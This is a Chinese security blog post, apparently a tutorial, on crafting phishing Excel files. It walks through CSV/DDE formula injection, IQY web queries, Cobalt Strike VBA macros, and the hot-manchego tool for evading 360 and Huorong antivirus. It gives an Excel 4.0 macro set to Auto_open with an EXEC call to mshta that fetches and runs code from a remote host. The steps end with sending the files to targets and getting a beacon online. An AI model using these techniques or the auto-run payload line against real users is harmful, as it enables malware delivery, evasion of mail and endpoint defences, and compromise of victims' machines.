【钓鱼攻防】浅谈制作免杀excel文档钓鱼

「上班让人感到最可怕的地方是，它居然让我因为盼着退休而期待衰老，而不是好好珍惜剩余人生里最年轻的每一天。」

「前言」

网络安全技术学习，承认⾃⼰的弱点不是丑事，只有对原理了然于⼼，才能突破更多的限制。

拥有快速学习能力的安全研究员，是不能有短板的，有的只能是大量的标准板和几块长板。

知识⾯，决定看到的攻击⾯有多⼴；知识链，决定发动的杀伤链有多深。

「1、CSV注入之RCE」

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量，攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷，当用户打开Excel文件时，文件会从CSV描述转变为原始的Excel格式，包括Excel提供的所有动态功能，在这个过程中，CSV中的所有Excel公式都会执行，当该函数有合法意图时，很易被滥用并允许恶意代码执行。

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能：

之后构造以下恶意载荷：

之后模拟用户打开Excel文件：点击更新

点击是

成功执行攻击载荷弹出计算器

反弹Shell

这里使用cs框架来实施攻击：

选择配置

使用文件下载功能

选择刚才生成的木马

构造恶意链接

之后在Excel中插入恶意载荷

发送给目标用户打开，点击更新

点击是

成功上线cs

CSV注入时常出现在数据导出功能部分，例如：将当前表格数据导出到Excel，此时攻击者可以在当前表格中插入恶意代码，之后当用户导出当前表格数据并保存为Excel，再次打开Excel时便会导致恶意载荷执行，同时CSV注入也可以用于钓鱼，攻击者可以精心构造一个富含大量数据的Excel并插入恶意代码，诱导受害者用户访问并查看，从而触发恶意代码~

「2、IQY特性钓鱼」

可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’（不能加载脚本），通过IQY【即web查询】语句，可以直接将各类web上的列表数据轻松引入到当前的excel中，而正是因为这样，从而给了我们利用excel制作钓鱼邮件的机会，假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码，那结果就不言而喻了。

利用过程：

新建一个excel文件，找到"数据"-->"自网站"-->"地址"，填写要抓取数据的网站url，选中想抓取数据的表单

在我们自己的服务器的网站目录下放一个rdyx0.html文件，内容是IYQ代码

填写网站url为：

点击确定

点击是

发送给用户，点击启用内容

点击是

成功上线cs

「3、制作基本的excel宏文件」

Cobalt Strike生成宏代码

选择监听器

成功生成宏文件

新建excel文档，点击视图——宏——查看宏

选择创建

选择本文件中ThisWorkbook，将cs生成的文件复制到里面

点击否

保存为xlsm后缀的文件

打开文件后，点击启用内容

cs上线

「4、宏免杀（hot-manchego的使用）」

「4.1 为什么钓鱼附件进不了收件箱」

随着类似msf,Cobalt Strike工具的出现，钓鱼邮件的制作成本大大降低了。但随之的问题也出现了，因为工具一般是写死的，无法定制化恶意执行代码，导致恶意代码的特征值很容易被抓取，会被发件服务器，收件邮件网关，本地杀毒等一系列防护设备或措施拦截。所以为了邮件能进收件箱，要搞清楚我们的钓鱼邮件在哪一个步骤挂掉了。一般常见的邮件流程如下：

邮件→邮件服务器→防毒→防垃圾→收件箱

「4.2 如何进行免杀」

要搞清楚我们的附件在什么环节被杀了，首先科普一下当下杀软的三种查杀方式：1.静态查杀 2.云查杀 3.行为查杀。邮件服务器为了可用性和隐私性一般只有静态查杀。所以我们只需要规避特征值绕过静态查杀就可以让钓鱼附件进入收件箱了。如何规避静态查杀？最好的办法当然是自己写恶意代码，但大部分云黑客都是脚本小子，这也没关系，现在github上也有很多免杀开源的脚本。这里以hot-manchego作为演示

编译成exe文件

「4.3 hot-manchego的使用」

下载hot-manchego脚本，并运行

这里我们需要将cs生成的宏写入vba脚本

运行hot-manchego，会生成rdyx0.xlsm文档

手动添加宏报毒

免杀后静态过360和火绒

点击启用内容

动态过360和火绒免杀，且不会提醒启用宏

「5、利用Excel 4.0宏执行任意命令上线cs」

了解：Excel 4.0宏

1992年发布用于Windows 3.0和3.1的电子表格软件Excel 4.0。对于自动化，可以通过所谓的宏工作表在此版本的Excel中使用XLM宏。X由于Microsoft很早就使用VBA宏（Visual Basic for Applications）来代替Excel 4.0宏技术，这导致Excel 4.0宏并不为大众所熟知。并且Excel 4.0宏存放在Excel 97 - 2003格式（.xls）文件中。

「5.1 插入宏工作表」

1.创建一个新的Excel工作簿。右键单击屏幕底部的“Sheet1”，然后单击“插入”。

2.弹出一个窗口，允许您从要插入的各种对象中进行选择。选择“MS Excel 4.0 宏表”并单击“确定”。

「5.2 编写宏」

已创建一个名为“rdyx0.xlsm”的新工作表。这是一种特殊的工作表类型，可以在其中输入XLM宏（所谓的宏表）。单击任何单元格并在此单元格和下面的后续单元格中输入公式=EXEC("mshta.exe http://rdyx0")，和= HALT()。这里依次命令解释：执行命令、停止。

「5.3 自动运行并隐藏宏」

如果希望在打开工作簿时自动运行宏（类似于VBA宏的Sub AutoOpen（）），请将宏的第一个单元格重命名为Auto_open。

打开文档后成功上线

「网络安全感悟」

网络安全是一个长期的过程，因为网络安全没有终点，不管是网络安全企业，还是在网络安全行业各种不同方向的从业人员，不管你选择哪个方向，只有在这条路上坚持不懈，才能在这条路上走的更远，走的更好，不然你肯定走不远，迟早会转行或者被淘汰，把时间全浪费掉。

如果你觉得自己是真的热爱网络安全这个行业，坚持走下去就可以了，不用去管别人，现在就是一个大浪淘金的时代，淘下去的是沙子，留下来的才是金子，正所谓，千淘万漉虽辛苦，吹尽狂沙始到金，网络安全的路还很长，坚持做好一件事！

「攻防交流群」

「声明」

文笔生疏，措辞浅薄，敬请各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章作者不为此承担任何责任。

转载声明：平凡安全 拥有对此文章的修改和解释权，如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章的内容，不得以任何方式将其用于商业目的。